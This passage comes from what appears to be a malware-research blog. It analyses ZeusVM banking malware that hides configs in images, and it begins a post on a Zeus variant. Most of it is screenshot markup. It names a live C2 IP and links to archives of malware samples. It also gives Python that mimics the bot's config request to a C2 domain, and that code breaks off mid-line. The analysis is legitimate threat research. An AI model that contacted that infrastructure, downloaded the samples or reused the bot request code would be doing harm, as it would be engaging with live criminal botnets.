href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MQoFrD0jrPj8iYcL_z3X5iROL3fbRZRz3GkM9Un2xU6Eg94Br4g_IeK_rFmpxPod56FgoFjJJvelP59ZHNbHvxcJ1Ayzroec4nNl_ABY1zCIDSjlGSk_saQkmuJZfoBG8bNCaESxGSg/s1600/16-02-2014+16-49-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MQoFrD0jrPj8iYcL_z3X5iROL3fbRZRz3GkM9Un2xU6Eg94Br4g_IeK_rFmpxPod56FgoFjJJvelP59ZHNbHvxcJ1Ayzroec4nNl_ABY1zCIDSjlGSk_saQkmuJZfoBG8bNCaESxGSg/s1600/16-02-2014+16-49-12.png" height="321" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzcBgrUSCYiLbKZFITWyk5yr6Fwz_5RocXbT4yEE37zGxjgWDw5iF9WwA9UJjwpo70WTcpTb7HzFYVb6GBfx8N22wTSUdxtXHZFhf3jbQZJPQkLg_KmRpyE0P90mgf_7cp0eLH9JRAt1k/s1600/16-02-2014+16-49-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzcBgrUSCYiLbKZFITWyk5yr6Fwz_5RocXbT4yEE37zGxjgWDw5iF9WwA9UJjwpo70WTcpTb7HzFYVb6GBfx8N22wTSUdxtXHZFhf3jbQZJPQkLg_KmRpyE0P90mgf_7cp0eLH9JRAt1k/s1600/16-02-2014+16-49-45.png" /></a></div> <br /> /one/:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBdP5W4HRkoDBmm170ItxPJPoibic3JcPFl7IW6jyyDps8fcGFaaAFtXExgc4OOm4YBdh8Sy-HSwPBuFvtmDlMEJObO59kIxMalBH2A4UYWFIxk_fZcRiZE1ouUgtax7g_axc9gfsZ9qI/s1600/16-02-2014+16-52-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBdP5W4HRkoDBmm170ItxPJPoibic3JcPFl7IW6jyyDps8fcGFaaAFtXExgc4OOm4YBdh8Sy-HSwPBuFvtmDlMEJObO59kIxMalBH2A4UYWFIxk_fZcRiZE1ouUgtax7g_axc9gfsZ9qI/s1600/16-02-2014+16-52-53.png" height="321" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_zem6KPOPtGeofeO5U52xR2rq-S9jXNPD4OFGHCRLzI_MBdGUElG4A4U787mh5KsxwzJc8bRsjfZkvGaEXn_iebs-OODMH30sZEIMJ47vbz5y3VnChtQNjx7NrXKIDqe_vj_1g0EBqg/s1600/16-02-2014+16-53-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_zem6KPOPtGeofeO5U52xR2rq-S9jXNPD4OFGHCRLzI_MBdGUElG4A4U787mh5KsxwzJc8bRsjfZkvGaEXn_iebs-OODMH30sZEIMJ47vbz5y3VnChtQNjx7NrXKIDqe_vj_1g0EBqg/s1600/16-02-2014+16-53-28.png" /></a></div> <br /> /two/ (unused):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI1Gz-Y5znfhyZ8OpIhn5at7fAACLXcSlXWW1JV57Kc132jfhyphenhyphenAK8Z2P2CzIqjcERMR4CUBETqUFXtRfJqmhobRGXEjdH3vgKhgVWciUOZCUojPJzs5U9J70tAAzJAx0DBnrBjE90TbqQ/s1600/16-02-2014+16-56-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI1Gz-Y5znfhyZ8OpIhn5at7fAACLXcSlXWW1JV57Kc132jfhyphenhyphenAK8Z2P2CzIqjcERMR4CUBETqUFXtRfJqmhobRGXEjdH3vgKhgVWciUOZCUojPJzs5U9J70tAAzJAx0DBnrBjE90TbqQ/s1600/16-02-2014+16-56-58.png" height="321" width="400" />/</a></div> <br /> /three/ (unused):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1AUMxogYV5Hd2AgBQT7XqRZ423cNlAaYrDbD8D89A4o00iPVrjdVmYDSi0E8zdyLZsnpRRcuZuiceD-TEvs2mj8Hf6IBc_N0jA4KA_b-EqtB7jOgn-laSjN5JN1EcEUFel5z_H9YyMc/s1600/16-02-2014+16-59-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1AUMxogYV5Hd2AgBQT7XqRZ423cNlAaYrDbD8D89A4o00iPVrjdVmYDSi0E8zdyLZsnpRRcuZuiceD-TEvs2mj8Hf6IBc_N0jA4KA_b-EqtB7jOgn-laSjN5JN1EcEUFel5z_H9YyMc/s1600/16-02-2014+16-59-05.png" height="321" width="400" /></a></div> <br /> /four/ (unused):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpDNKq2aHJidyE1XAhhFeHO0xZxxxqBTYBzYIedbFDAbHC7XM_vf43WJvtpTL5ijihtn8AI2rXVUxWSmgYcekySC84bq0wr7LND8D45CRzWLE86ka1dV6GF3KmtrcXYjEgN8OT-J_ZKQ8/s1600/16-02-2014+17-00-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpDNKq2aHJidyE1XAhhFeHO0xZxxxqBTYBzYIedbFDAbHC7XM_vf43WJvtpTL5ijihtn8AI2rXVUxWSmgYcekySC84bq0wr7LND8D45CRzWLE86ka1dV6GF3KmtrcXYjEgN8OT-J_ZKQ8/s1600/16-02-2014+17-00-42.png" height="321" width="400" /></a></div> <br /> Now, for decoding those ZeusVM images, as described by Jerome, you just need to strip the image and do the following: Base64+RC4+VisualDecrypt+UCL Decompress<br /> <br /> Here are some 'malicious' image from 212.44.64.202:<br /> mix.jpg: <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjjZm2m4qpJdB8GqR3_toRaQpKTLmBoHrQunuFMS8eRBF1QrPXNnbl4uS8cJCQTfPEsv7FKphqg_-mUiHIicl9IfPE-yXOuQpjp_-vVXRfTXrge8Dr-sRQvCkLchTd60EsWFo1PnivZmQ/s1600/22-02-2014+19-00-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjjZm2m4qpJdB8GqR3_toRaQpKTLmBoHrQunuFMS8eRBF1QrPXNnbl4uS8cJCQTfPEsv7FKphqg_-mUiHIicl9IfPE-yXOuQpjp_-vVXRfTXrge8Dr-sRQvCkLchTd60EsWFo1PnivZmQ/s1600/22-02-2014+19-00-47.png" height="318" width="400" /></a></div> mix.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpMSLBUT-EBog7YTQt3jG7PKzOVjqOGxZjebLzbagNdXR_j7shuwiOwNUnm3LyK6niybMZQWWGvujjnOQyjPLeVvAB_Frw9XwYcMJEVsfS_zX1dBO0jNsZHk4kCAXPcvOlXNAVUHn3Ogo/s1600/22-02-2014+18-51-59.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpMSLBUT-EBog7YTQt3jG7PKzOVjqOGxZjebLzbagNdXR_j7shuwiOwNUnm3LyK6niybMZQWWGvujjnOQyjPLeVvAB_Frw9XwYcMJEVsfS_zX1dBO0jNsZHk4kCAXPcvOlXNAVUHn3Ogo/s1600/22-02-2014+18-51-59.png" /></a></div> mix.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHYDJrmYp259orC6XEAGb5uqeCPekqvKqSjp3wTbJ9ccLEIbuvdL8URW1-i2aRe98BbCz8kS-mlDmjNtkz8MPS-7kmosMITGY7Y4sywpMNNKIILpk4O3GsFvRVtvPTnQSEVF1K7mi10I/s1600/22-02-2014+19-02-40.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHYDJrmYp259orC6XEAGb5uqeCPekqvKqSjp3wTbJ9ccLEIbuvdL8URW1-i2aRe98BbCz8kS-mlDmjNtkz8MPS-7kmosMITGY7Y4sywpMNNKIILpk4O3GsFvRVtvPTnQSEVF1K7mi10I/s1600/22-02-2014+19-02-40.jpg" height="270" width="400" /></a></div> mix.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii0AVykGJlOu7k1efWs7_fDYjLUSpnPzh_ahbBvlhQezqwkI9ibq5ovqSzmOxtA3nWRaYuxXtv3eMRt7a6vFf5D1z6fKQMlkST9abEMMqvzPowLpayLA6z9YqpPFHM5mOyrvqF-E-Paz4/s1600/22-02-2014+19-03-19.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii0AVykGJlOu7k1efWs7_fDYjLUSpnPzh_ahbBvlhQezqwkI9ibq5ovqSzmOxtA3nWRaYuxXtv3eMRt7a6vFf5D1z6fKQMlkST9abEMMqvzPowLpayLA6z9YqpPFHM5mOyrvqF-E-Paz4/s1600/22-02-2014+19-03-19.png" /></a></div> config.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsyhW3jiGeKTBBmJKH2zvEqBMtufWpYfxUXLO7Z78A18fVwjmTilkaR2pizpasGmFkttinDss531SYcyAieFuM8YG83quXUsVRXvhIjvqKEQTYkS_7q6NCPjlOYGQRF5T1jcz1jJ-Z5g/s1600/22-02-2014+18-54-43.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsyhW3jiGeKTBBmJKH2zvEqBMtufWpYfxUXLO7Z78A18fVwjmTilkaR2pizpasGmFkttinDss531SYcyAieFuM8YG83quXUsVRXvhIjvqKEQTYkS_7q6NCPjlOYGQRF5T1jcz1jJ-Z5g/s1600/22-02-2014+18-54-43.png" height="250" width="400" /></a></div> kartamestnosti.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReZvM8XlkiaXeOjOSLf-ZLFufdU3Gn241piEcN0i4eVs5PS_3161nfp8GimqT-sdwtGWN-zwjJo4lCIRR1nYD9cBpqvANhkpIkBgAJ7yXa8CukBLUaGqiqrc0xHlTuSfb2AL-TsWuHEM/s1600/22-02-2014+18-56-27.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReZvM8XlkiaXeOjOSLf-ZLFufdU3Gn241piEcN0i4eVs5PS_3161nfp8GimqT-sdwtGWN-zwjJo4lCIRR1nYD9cBpqvANhkpIkBgAJ7yXa8CukBLUaGqiqrc0xHlTuSfb2AL-TsWuHEM/s1600/22-02-2014+18-56-27.jpg" height="300" width="400" /></a></div> webi_test.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8C5-fInWeHkDHEC0FyPYduIlBDJI_oGpAGJi_hxY8Wei7X_SOMiqQrxDYYZl7En8DVwcpb_hxhWjB8eReoBbdeEfiMDlUfN4k0TSRQk6ENzW-SAYp_NT8evgUqeFz4PlS75K6iTK9WFQ/s1600/22-02-2014+18-57-09.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8C5-fInWeHkDHEC0FyPYduIlBDJI_oGpAGJi_hxY8Wei7X_SOMiqQrxDYYZl7En8DVwcpb_hxhWjB8eReoBbdeEfiMDlUfN4k0TSRQk6ENzW-SAYp_NT8evgUqeFz4PlS75K6iTK9WFQ/s1600/22-02-2014+18-57-09.png" height="290" width="400" /></a></div> uwliottrekera.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib2Oljv4GXu30-ZG0_4gSr0TcDKA_ZKnQqkqSiydXAD7iky1xo9kgsCgGpLB_p8XCXb4wl5rf0K5omugrMFvHr9ZPA-neOGTLVl8abxhvHFKSPuLI6dJ25vOlSsOgBQTkubgANmQF1Mrg/s1600/22-02-2014+18-49-45.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib2Oljv4GXu30-ZG0_4gSr0TcDKA_ZKnQqkqSiydXAD7iky1xo9kgsCgGpLB_p8XCXb4wl5rf0K5omugrMFvHr9ZPA-neOGTLVl8abxhvHFKSPuLI6dJ25vOlSsOgBQTkubgANmQF1Mrg/s1600/22-02-2014+18-49-45.png" height="185" width="400" /></a></div> &nbsp;test_vnc2.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYvLScj_laQZ1iRh9KTGdHClfSztnkX2P9auVr3w61gJs42sP7MMwf_X1A1RylJ1vdTtvk6CaoYY0GkXjc1WzXNk1OCufYJ6VgUfDRD8SVqhA1oRVOL3D52DlOIEXuXlNYpnr1D5aRvs4/s1600/22-02-2014+18-50-43.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYvLScj_laQZ1iRh9KTGdHClfSztnkX2P9auVr3w61gJs42sP7MMwf_X1A1RylJ1vdTtvk6CaoYY0GkXjc1WzXNk1OCufYJ6VgUfDRD8SVqhA1oRVOL3D52DlOIEXuXlNYpnr1D5aRvs4/s1600/22-02-2014+18-50-43.jpg" height="223" width="400" /></a></div> x64hook.jpg:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikJg9KkqfRICJVXPcPs1vnKRhMDQWNuwfx9PKpAL8_KGL1JNQAc-A0xzrDIu8DDDlXed9JmgVDyyeI1zlf2yiv6ef6VPt9lhPJGV-yVj_xpqt6juQcNCQDyZ04cqqs080rdZG9UkU_RGU/s1600/22-02-2014+18-58-21.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikJg9KkqfRICJVXPcPs1vnKRhMDQWNuwfx9PKpAL8_KGL1JNQAc-A0xzrDIu8DDDlXed9JmgVDyyeI1zlf2yiv6ef6VPt9lhPJGV-yVj_xpqt6juQcNCQDyZ04cqqs080rdZG9UkU_RGU/s1600/22-02-2014+18-58-21.jpg" height="265" width="400" /></a></div> <br /> Some configs was done for tests:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZLlp11rexkVvUMBpLA-kL6XujmT87LYjEMreXb9DE80g4tmqFli1LxBl_n7ipRU5V_LYab9DC4nyqke1xLbyE4PViZA70QwH9k4iMPD-owX1CFxjZD8qWJ75GebbQS2sv5ZHtwiiu8tY/s1600/22-02-2014+19-13-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZLlp11rexkVvUMBpLA-kL6XujmT87LYjEMreXb9DE80g4tmqFli1LxBl_n7ipRU5V_LYab9DC4nyqke1xLbyE4PViZA70QwH9k4iMPD-owX1CFxjZD8qWJ75GebbQS2sv5ZHtwiiu8tY/s1600/22-02-2014+19-13-30.png" height="118" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVrzTcuIsFs7J8koqlh5kBtthtR-vZM_NHaYsaBb-a8hQALs6JBd1FC44Ny4k03w9R8oiwP_gRNUaLY0NDxU8mt3H5DGS1CEvEFSGI_H9VmXi-93Y3ZKZ0FHqXpX3gRz3cgsAF-z9LVPA/s1600/22-02-2014+19-14-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVrzTcuIsFs7J8koqlh5kBtthtR-vZM_NHaYsaBb-a8hQALs6JBd1FC44Ny4k03w9R8oiwP_gRNUaLY0NDxU8mt3H5DGS1CEvEFSGI_H9VmXi-93Y3ZKZ0FHqXpX3gRz3cgsAF-z9LVPA/s1600/22-02-2014+19-14-10.png" height="118" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1YzqX7WikwNAciSZ9LnvOfFxpQbNI36cJDZhYolAM0gZEcz5Df8C34cNAJwhkskbhuvEcoybdIM1u5K93dMCYmJrd00jLrL_NprvSKoKRckI1JoZ7gAG-ab79tm1zQN7SGzsXUMNZjhY/s1600/22-02-2014+19-14-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1YzqX7WikwNAciSZ9LnvOfFxpQbNI36cJDZhYolAM0gZEcz5Df8C34cNAJwhkskbhuvEcoybdIM1u5K93dMCYmJrd00jLrL_NprvSKoKRckI1JoZ7gAG-ab79tm1zQN7SGzsXUMNZjhY/s1600/22-02-2014+19-14-43.png" height="118" width="400" /></a></div> <br /> And some wasn't for test, targeting banks with MiTB.<br /> Malicious code injection, on a ZeusVM botnet targeting France: <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbJvUGr2nq0EQm3OeQUOE-9NEmv65G2M8FeVUwAGpy1wf-bof4OyVr57FSr1GwJjGz-qyYyPZLUy8b9MuJ1JJpSDsoswz5qOZqcoC5G-UFdlHKssWwPnDgV7ekRJm2VTwEpfdOn5Pc14/s1600/22-02-2014+19-48-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbJvUGr2nq0EQm3OeQUOE-9NEmv65G2M8FeVUwAGpy1wf-bof4OyVr57FSr1GwJjGz-qyYyPZLUy8b9MuJ1JJpSDsoswz5qOZqcoC5G-UFdlHKssWwPnDgV7ekRJm2VTwEpfdOn5Pc14/s1600/22-02-2014+19-48-42.png" height="300" width="400" /></a></div> <br /> Lame webinject:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3mkFDqTVuLhH_E1dp_e-NgHV5kEVxXJBKZqXJl_EfHlKgzgTows7NnQ2LnspvIUATsfaGdEhjyveFaLCmnFvYev5A-jV78TW0B6N0DZErTVY9YoAfymyiHbAMvfgYTYSUrM1gUzQHU3c/s1600/22-02-2014+20-23-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3mkFDqTVuLhH_E1dp_e-NgHV5kEVxXJBKZqXJl_EfHlKgzgTows7NnQ2LnspvIUATsfaGdEhjyveFaLCmnFvYev5A-jV78TW0B6N0DZErTVY9YoAfymyiHbAMvfgYTYSUrM1gUzQHU3c/s1600/22-02-2014+20-23-03.png" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsdArIvxQ2RC8Pst6qHJyDJAAw5-CuTgkkmRkmC0txyBX4NPHZiFqMYHKGnNK1gxENGBS8BCc9qdEKm_GqA2I2gkLDM3c4zVL3onyx40fEJWgSy5DDqYpjxqadWWS8zB8OSkwENjq69Q/s1600/22-02-2014+21-05-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsdArIvxQ2RC8Pst6qHJyDJAAw5-CuTgkkmRkmC0txyBX4NPHZiFqMYHKGnNK1gxENGBS8BCc9qdEKm_GqA2I2gkLDM3c4zVL3onyx40fEJWgSy5DDqYpjxqadWWS8zB8OSkwENjq69Q/s1600/22-02-2014+21-05-56.png" height="378" width="400" /></a></div> <br /> CCGRAB:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1OkLl09qUgF5PLNjaVJymctBudjRF388Q-bIT6jvVzaj9PLr4-TYVSo8lM4JNjH4RsLGxAON4Cx9Wi_JMgOOHWmcP5ons47axSc97Rbxm1HFOF8-3YbSWd9brmwA9YeFLzVAq2gaZPXI/s1600/22-02-2014+18-37-52.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1OkLl09qUgF5PLNjaVJymctBudjRF388Q-bIT6jvVzaj9PLr4-TYVSo8lM4JNjH4RsLGxAON4Cx9Wi_JMgOOHWmcP5ons47axSc97Rbxm1HFOF8-3YbSWd9brmwA9YeFLzVAq2gaZPXI/s1600/22-02-2014+18-37-52.png" height="118" width="400" /></a></div> ATSEngine:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi6Hv5opCXmteDRIkuO0z4wAP3zDUywDqAiaYIgTg_GQfi6YOl9_pOXqDbsu83sriM-ANNWpgd1FNdJQVsXZ6BjcVdNzcmAm_uRhrrRsttNkHAlhSL4CeVv7GMQFjK_RdcJ1kNcn3Vm5o/s1600/20-02-2014+14-21-35.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi6Hv5opCXmteDRIkuO0z4wAP3zDUywDqAiaYIgTg_GQfi6YOl9_pOXqDbsu83sriM-ANNWpgd1FNdJQVsXZ6BjcVdNzcmAm_uRhrrRsttNkHAlhSL4CeVv7GMQFjK_RdcJ1kNcn3Vm5o/s1600/20-02-2014+14-21-35.png" height="202" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLkpWEmHBCYkWHdb9vV_4XqdmF0XKprq9pNQWcV3kLABR0o1QmPI8oCnq_p-D0AKvYEH8lCmak7E3lKMdH_gP90EzjD5DHNN1LRJ7iHYYO2lUIuFGj6HmM3sq1PfjDQ5IRj2dcFikmFow/s1600/20-02-2014+14-22-05.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLkpWEmHBCYkWHdb9vV_4XqdmF0XKprq9pNQWcV3kLABR0o1QmPI8oCnq_p-D0AKvYEH8lCmak7E3lKMdH_gP90EzjD5DHNN1LRJ7iHYYO2lUIuFGj6HmM3sq1PfjDQ5IRj2dcFikmFow/s1600/20-02-2014+14-22-05.png" height="202" width="400" /></a></div> <br /> Nowadays more actors start to use ZeusVM, like the group who was using the 'private' version of <a href="http://securityblog.s21sec.com/2014/02/citadel-involution.html">Citadel 3.1.0.0</a> and the group who was targeting <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1465&amp;start=70#p20700">Japan</a>.<br /> Both switched on ZeusVM as alternative of Citadel.<br /> <br /> You can find the samples related to 212.44.64.202 with config and decoded here:<br /> <a href="http://temari.fr/vx/ZeusVMs_212.44.64.202.7z">http://temari.fr/vx/ZeusVMs_212.44.64.202.7z</a><br /> <br /> Some other ZeusVM samples (not related to 212.44.64.202):<br /> <a href="http://temari.fr/vx/ZeusVMs_v1.0.0.2_v1.0.0.5.7z">http://temari.fr/vx/ZeusVMs_v1.0.0.2_v1.0.0.5.7z</a><br /> <br /> <br /> <br /> <br /> <br /> root/root<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOSdBaaFZXsbeDTaHdkvbAMesQ9uor30prUwiiPM35XW7to99apJt3aEaOzOQTE75dA2BiIF6gX1IADv1d1IhuFXyDjDCeSSw_kA47tfv_AzqX1_-Rj4MT_EFuz-siIzaWI2vP63gxwQ/s1600/mfw_kins.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOSdBaaFZXsbeDTaHdkvbAMesQ9uor30prUwiiPM35XW7to99apJt3aEaOzOQTE75dA2BiIF6gX1IADv1d1IhuFXyDjDCeSSw_kA47tfv_AzqX1_-Rj4MT_EFuz-siIzaWI2vP63gxwQ/s1600/mfw_kins.png" height="241" width="400" /></a></div> https://www.xylibox.com/2014/04/zeusvm-and-steganography.htmlnoreply@blogger.com (Steven K)14tag:blogger.com,1999:blog-5365964245877416061.post-8832729250252819938Tue, 04 Mar 2014 18:30:00 +00002014-03-04T19:36:55.632+01:00PerkelPerkeleTrusteer-Mobile.apkZeus 1.1.2.1Zeus 1.1.3.4Zeus v2<a href="http://israel.emc.com/emc-plus/rsa-thought-leadership/firstwatch/index.htm">RSA FirstWatch</a> throw me recently a sample of a 'new' Zeus variant.<br /> I didn't really check all the changes that were made but seem it's nothing more than just a standard Zeus v2.<br /> But wait, it communicates over SSL and had a new kind of HTTP request pattern:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgimmriXRVKKaaSDYl5zAcFHZ6fTN7I2OdrY-Y-uMMEdXRwCndcSiLnxkcVE8gbIZgorUHNMm4H_bWF11ZYJw1ILilSWUPGxGqYrCCtVKaErI12jOi4-tnsCAPdssFD_4snPqB7lPrHN8E/s1600/04-03-2014+18-38-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgimmriXRVKKaaSDYl5zAcFHZ6fTN7I2OdrY-Y-uMMEdXRwCndcSiLnxkcVE8gbIZgorUHNMm4H_bWF11ZYJw1ILilSWUPGxGqYrCCtVKaErI12jOi4-tnsCAPdssFD_4snPqB7lPrHN8E/s1600/04-03-2014+18-38-34.png" height="293" width="400" /></a></div> <br /> Fiddler: <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixpPQeo-kHB_FY7ijor7ok1lmkzyxFmKu6vRRWYGkQwXb9jJKKkZsUIVLrbRbjmsTSLqTc-2870Hr2xgdFQMt6QDlikh5F3p6Q9iExx0YO4XFT7XaRhYNLZosa8Sg1N3jSni6ao81L3HE/s1600/02-03-2014+21-14-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixpPQeo-kHB_FY7ijor7ok1lmkzyxFmKu6vRRWYGkQwXb9jJKKkZsUIVLrbRbjmsTSLqTc-2870Hr2xgdFQMt6QDlikh5F3p6Q9iExx0YO4XFT7XaRhYNLZosa8Sg1N3jSni6ao81L3HE/s1600/02-03-2014+21-14-59.png" /></a></div> <br /> Config download in python:<br /> <div class="python" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> <span style="color: #ff7700; font-weight: bold;">import</span> <span style="color: crimson;">urllib2</span><br /> <br /> request = <span style="color: crimson;">urllib2</span>.<span style="color: black;">Request</span><span style="color: black;">(</span><span style="color: darkslateblue;">'https://secureinformat.com/?ajax'</span><span style="color: black;">)</span><br /> request.<span style="color: black;">add_header</span><span style="color: black;">(</span><span style="color: darkslateblue;">'Accept'</span>, <span style="color: darkslateblue;">'*/*'</span><span style="color: black;">)</span><br /> request.<span style="color: black;">add_header</span><span style="color: black;">(</span><span style="color: darkslateblue;">'X_ID'</span>, <span style="color: darkslateblue;">'14E255CE7875768FBC303C10'</span><span style="color: black;">)</span><br /> request.<span style="color: black;">add_header</span><span style="color: black;">(</span><span style="color: darkslateblue;">'X_OS'</span>, <span style="color: darkslateblue;">'510'</span><span style="color: black;">)</span><br /> request.<span style="color: black;">add_header</span><span style="color: black;">(</span><span style="color: darkslateblue;">'X_BV'</span>, <span style="color: darkslateblue;">'1.1.3.4'</span><span style="color: black;">)</span><br /> request.<span style="color: black;">add_header</span><span style="color: black;">(</span><span style="color: darkslateblue;">'Control'</span>, <span style="color: darkslateblue;">'no-cache'</span><span style="color: black;">)</span><br /> request.<span style="color: black;">add_header</span><span style="color: black;">(</span><span style="color: darkslateblue;">'User-Agent'</span>, <span style="color: darkslateblue;">'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;'</span><span style="color: black;">)</span><br /> page = 